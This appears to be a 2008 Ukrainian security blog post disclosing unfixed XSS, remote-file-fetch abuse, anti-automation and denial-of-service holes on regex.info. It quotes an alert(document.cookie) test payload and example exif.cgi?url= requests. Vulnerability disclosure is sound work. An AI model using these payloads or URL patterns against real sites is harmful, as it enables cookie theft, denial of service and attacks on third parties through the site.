Websecurity - Веб безпека

22.03.2008

У вересні, 01.09.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting, Abuse of Functionality, Insufficient Anti-automation та Denial of Service уразливості на проекті http://regex.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

27.08.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення (PR4)

Abuse of Functionality:

http://regex.info/exif.cgi?url=http://site/file

Віддалене викачення файлів, що може бути використано для атаки на інші сайти.

Insufficient Anti-automation:

http://regex.info/exif.cgi?url=http://site/file

DoS:

http://regex.info/exif.cgi?url=http://site/big_file

Дані уразливості досі не виправлені.

This entry was posted on 19:39 27.08.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.